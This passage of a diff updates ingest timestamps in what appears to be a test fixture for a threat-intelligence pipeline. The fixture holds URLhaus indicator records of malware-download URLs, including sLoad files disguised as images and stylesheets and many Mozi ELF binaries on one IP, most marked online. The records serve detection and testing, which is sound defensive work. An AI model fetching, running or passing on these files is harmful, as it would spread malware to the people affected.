UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6486,7 +6486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025471Z", + "ingested": "2021-12-14T14:56:15.726440756Z", "original": "{\"id\":\"961412\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961412/\",\"url\":\"https://univirtek.com/viro/01074480250/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6532,7 +6532,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025477900Z", + "ingested": "2021-12-14T14:56:15.726441110Z", "original": "{\"id\":\"961413\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961413/\",\"url\":\"https://cxminute.com/minu/SCHRKE77C47G224W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6578,7 +6578,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025484900Z", + "ingested": "2021-12-14T14:56:15.726441475Z", "original": "{\"id\":\"961414\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961414/\",\"url\":\"https://cxminute.com/minu/04281560377/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6624,7 +6624,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025491800Z", + "ingested": "2021-12-14T14:56:15.726441836Z", "original": "{\"id\":\"961415\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961415/\",\"url\":\"https://ladiesincode.com/ladi/02613440060/maps.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6670,7 +6670,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025498700Z", + "ingested": "2021-12-14T14:56:15.726442216Z", "original": "{\"id\":\"961406\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961406/\",\"url\":\"https://nowyouknowent.com/werdona/PLLRRT83A05H501O/it.gif\",\"url_status\":\"offline\",\"host\":\"nowyouknowent.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6716,7 +6716,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025505500Z", + "ingested": "2021-12-14T14:56:15.726442577Z", "original": "{\"id\":\"961407\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961407/\",\"url\":\"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png\",\"url_status\":\"offline\",\"host\":\"hoagtechhydroponics.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6762,7 +6762,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025512400Z", + "ingested": "2021-12-14T14:56:15.726442933Z", "original": "{\"id\":\"961404\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961404/\",\"url\":\"https://belfetproduction.com/bella/00160060349/uk.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6808,7 +6808,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025519300Z", + "ingested": "2021-12-14T14:56:15.726443433Z", "original": "{\"id\":\"961405\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961405/\",\"url\":\"https://belfetproduction.com/bella/01288650243/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6858,7 +6858,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025526200Z", + "ingested": "2021-12-14T14:56:15.726443793Z", "original": "{\"id\":\"961403\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961403/\",\"url\":\"http://89.160.20.156:50611/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:39:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -6907,7 +6907,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025533Z", + "ingested": "2021-12-14T14:56:15.726444141Z", "original": "{\"id\":\"961402\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961402/\",\"url\":\"http://89.160.20.156:45371/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -6956,7 +6956,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025539800Z", + "ingested": "2021-12-14T14:56:15.726444500Z", "original": "{\"id\":\"961400\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961400/\",\"url\":\"http://89.160.20.156:50093/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7005,7 +7005,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025546700Z", + "ingested": "2021-12-14T14:56:15.726444934Z", "original": "{\"id\":\"961401\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961401/\",\"url\":\"http://89.160.20.156:36652/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7054,7 +7054,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025555600Z", + "ingested": "2021-12-14T14:56:15.726445296Z", "original": "{\"id\":\"961397\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961397/\",\"url\":\"http://89.160.20.156:54182/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7103,7 +7103,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025562700Z", + "ingested": "2021-12-14T14:56:15.726445700Z", "original": "{\"id\":\"961398\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961398/\",\"url\":\"http://89.160.20.156:46048/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7152,7 +7152,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025569900Z", + "ingested": "2021-12-14T14:56:15.726446053Z", "original": "{\"id\":\"961399\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961399/\",\"url\":\"http://89.160.20.156:33953/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7201,7 +7201,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025576800Z", + "ingested": "2021-12-14T14:56:15.726446485Z", "original": "{\"id\":\"961393\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961393/\",\"url\":\"http://89.160.20.156:36447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7250,7 +7250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025583700Z", + "ingested": "2021-12-14T14:56:15.726446905Z", "original": "{\"id\":\"961394\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961394/\",\"url\":\"http://89.160.20.156:36828/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7299,7 +7299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025590600Z", + "ingested": "2021-12-14T14:56:15.726447267Z", "original": "{\"id\":\"961395\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961395/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7348,7 +7348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025599800Z", + "ingested": "2021-12-14T14:56:15.726447624Z", "original": "{\"id\":\"961396\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961396/\",\"url\":\"http://89.160.20.156:49772/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7397,7 +7397,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025607300Z", + "ingested": "2021-12-14T14:56:15.726447983Z", "original": "{\"id\":\"961391\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961391/\",\"url\":\"http://89.160.20.156:50229/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7446,7 +7446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025614200Z", + "ingested": "2021-12-14T14:56:15.726448447Z", "original": "{\"id\":\"961392\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961392/\",\"url\":\"http://89.160.20.156:39996/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7495,7 +7495,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025621100Z", + "ingested": "2021-12-14T14:56:15.726448800Z", "original": "{\"id\":\"961387\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961387/\",\"url\":\"http://89.160.20.156:50195/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7544,7 +7544,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025628Z", + "ingested": "2021-12-14T14:56:15.726449157Z", "original": "{\"id\":\"961388\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961388/\",\"url\":\"http://89.160.20.156:52447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7593,7 +7593,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025634900Z", + "ingested": "2021-12-14T14:56:15.726449536Z", "original": "{\"id\":\"961389\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961389/\",\"url\":\"http://89.160.20.156:56321/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7642,7 +7642,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025641700Z", + "ingested": "2021-12-14T14:56:15.726449946Z", "original": "{\"id\":\"961390\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961390/\",\"url\":\"http://89.160.20.156:54620/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7691,7 +7691,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025648600Z", + "ingested": "2021-12-14T14:56:15.726450409Z", "original": "{\"id\":\"961386\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961386/\",\"url\":\"http://89.160.20.156:52064/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:23:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7740,7 +7740,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025655300Z", + "ingested": "2021-12-14T14:56:15.726450767Z", "original": "{\"id\":\"961385\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961385/\",\"url\":\"http://89.160.20.156:47401/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7789,7 +7789,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025662500Z", + "ingested": "2021-12-14T14:56:15.726451335Z", "original": "{\"id\":\"961382\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961382/\",\"url\":\"http://89.160.20.156:46527/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7838,7 +7838,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025669400Z", + "ingested": "2021-12-14T14:56:15.726451861Z", "original": "{\"id\":\"961383\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961383/\",\"url\":\"http://89.160.20.156:38132/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7887,7 +7887,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025676600Z", + "ingested": "2021-12-14T14:56:15.726452223Z", "original": "{\"id\":\"961384\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961384/\",\"url\":\"http://89.160.20.156:59015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7936,7 +7936,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025683400Z", + "ingested": "2021-12-14T14:56:15.726452578Z", "original": "{\"id\":\"961379\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961379/\",\"url\":\"http://89.160.20.156:59454/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -7985,7 +7985,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025690300Z", + "ingested": "2021-12-14T14:56:15.726452941Z", "original": "{\"id\":\"961380\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961380/\",\"url\":\"http://89.160.20.156:37883/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8034,7 +8034,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025698700Z", + "ingested": "2021-12-14T14:56:15.726453352Z", "original": "{\"id\":\"961381\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961381/\",\"url\":\"http://89.160.20.156:55209/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8083,7 +8083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025705900Z", + "ingested": "2021-12-14T14:56:15.726453841Z", "original": "{\"id\":\"961378\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961378/\",\"url\":\"http://89.160.20.156:41062/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -8132,7 +8132,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025712700Z", + "ingested": "2021-12-14T14:56:15.726454193Z", "original": "{\"id\":\"961377\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961377/\",\"url\":\"http://89.160.20.156:60380/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -8181,7 +8181,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025719700Z", + "ingested": "2021-12-14T14:56:15.726454551Z", "original": "{\"id\":\"961375\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961375/\",\"url\":\"http://89.160.20.156:54796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8230,7 +8230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025726600Z", + "ingested": "2021-12-14T14:56:15.726454906Z", "original": "{\"id\":\"961376\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961376/\",\"url\":\"http://89.160.20.156:35251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -8279,7 +8279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025733600Z", + "ingested": "2021-12-14T14:56:15.726455381Z", "original": "{\"id\":\"961373\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961373/\",\"url\":\"http://89.160.20.156:50562/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8328,7 +8328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025740500Z", + "ingested": "2021-12-14T14:56:15.726455742Z", "original": "{\"id\":\"961374\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961374/\",\"url\":\"http://89.160.20.156:33445/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8377,7 +8377,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025747400Z", + "ingested": "2021-12-14T14:56:15.726456104Z", "original": "{\"id\":\"961370\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961370/\",\"url\":\"http://89.160.20.156:60280/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -8426,7 +8426,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025754200Z", + "ingested": "2021-12-14T14:56:15.726456469Z", "original": "{\"id\":\"961371\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961371/\",\"url\":\"http://89.160.20.156:46386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8475,7 +8475,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025761200Z", + "ingested": "2021-12-14T14:56:15.726457050Z", "original": "{\"id\":\"961372\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961372/\",\"url\":\"http://89.160.20.156:60288/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8524,7 +8524,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025768200Z", + "ingested": "2021-12-14T14:56:15.726457593Z", "original": "{\"id\":\"961368\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961368/\",\"url\":\"http://89.160.20.156:49731/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
